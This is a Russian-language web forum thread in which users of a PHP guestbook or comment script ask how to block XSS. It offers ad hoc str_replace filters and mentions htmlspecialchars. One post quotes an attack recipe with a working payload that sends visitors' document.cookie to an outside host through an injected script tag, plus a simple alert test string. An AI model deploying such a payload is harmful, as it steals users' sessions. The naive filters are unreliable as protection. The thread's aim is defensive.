Безопасность от тега script !

Попробовал вставить код, всё равно не помогает ... Подскажите как его вставить и куда ?

тогда пиши там под шапкой это
$msg = str_replace('<','',$msg);
$msg = str_replace('./','',$msg);
$msg = str_replace("'","",$msg);
$msg = str_replace('"','',$msg);
$msg = str_replace('>','',$msg);
$msg = str_replace(';','',$msg);
везде вместо $msg пишешь ту переменную которую хочешь фильтравать
если не получится то по середине !

тоесть <script> вместо $msg

htmlspecialchars читай про функцию там уже хорошо будет)

14 $мсг а не <скрипт>
переменная какая?
<инпут тайп="техт" нейм="здесь что написанно?" >

Можно проверять и так:http://site.ru/addkomm.php?msg="><script>alert('XSS')</script>Если алерт выполнится - есть XSS[цитата] Теперь нам ничего не мешает дать серверу на исполнение скрипт вписав его в поле ввода комментария:"><script>img=new Image(); img.src="http://voland-city.ru/ps/s.gif?"+document.cookie</script>или же приписать скрипт в URLhttp://site.ru/addkomm.php?msg="><script>img=new Image(); img.src="http://voland-city.ru/ps/s.gif?"+document.cookie</script>[цитата] В данном случае, нам остается только зайти в лог сниффера и ждать, пока в нем отобразятся cookies юзеров, посетивших зараженную гостевую. Как мне вот от этого обезопасится, подскажите ? Что прописать то ?

В 15.9 9 дырок

Ангел Смерти озвуч как закрыть ?

Руками... 7 из 9 XSS, одна инклуд, еще одна даже без категории 5 из дыр в папке games

На одной странице я пишу код с мотора:

<? 
function check($message){ 
$message=str_replace("I","I",$message); 
$message=str_replace(";","",$message); 
$message=htmlspecialchars($message); 
$message=stripslashes(trim($message)); 
return $message; } 

и под ней пишу так
$message=check($message); но переменная не фильтруется. почему?